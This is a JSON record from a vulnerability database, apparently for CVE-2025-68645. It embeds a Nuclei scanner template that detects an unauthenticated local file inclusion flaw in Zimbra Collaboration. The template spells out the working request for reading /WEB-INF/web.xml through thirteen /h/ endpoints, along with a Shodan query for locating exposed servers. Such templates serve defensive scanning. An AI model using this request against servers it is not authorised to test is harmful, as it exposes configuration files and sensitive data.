{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-68645/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-68645/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-68645/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-68645/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-68645/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-68645"},"sightings":{"href":"/api/v1/sightings/cve-2025-68645"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-68645.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2025-68645\n\ninfo:\n  name: Zimbra Collaboration - Local File Inclusion\n  author: DhiyaneshDk,sirifu4k1\n  severity: high\n  description: |\n    Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.\n  impact: |\n    Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.\n  remediation: |\n    Update to the latest version of Zimbra Collaboration.\n  reference:\n    - https://x.com/sirifu4k1/status/2006031417088639064\n    - https://x.com/sirifu4k1/status/2007279822050078906?s=12&amp;t=ovaWmJElNlGyzadE74ZOgQ\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-68645\n  metadata:\n    max-request: 13\n    verified: true\n    shodan-query: http.title:\"Zimbra Collaboration Suite\"\n  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml\"\n\n    payloads:\n      path:\n        - \"h/rest\"\n        - \"h/changepass\"\n        - \"h/imessage\"\n        - \"h/postLoginRedirect\"\n        - \"h/printcalls\"\n        - \"h/printcalendar\"\n        - \"h/printvoicemails\"\n        - \"h/printappointments\"\n        - \"h/printcontacts\"\n        - \"h/printconversations\"\n        - \"h/printmessage\"\n        - \"h/printtasks\"\n        - \"h/viewimages\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<?xml version\"\n          - \"web-app>\"\n          - \"Zimbra\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022063c1d833497a5af4b51f6958424f6fa0560b92b57e814bbc5e1f9ae484f07ea60220792947c7235b30bc667bae2d497a656e5e081fee626f1d672b9473bba2d73565:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-68645"}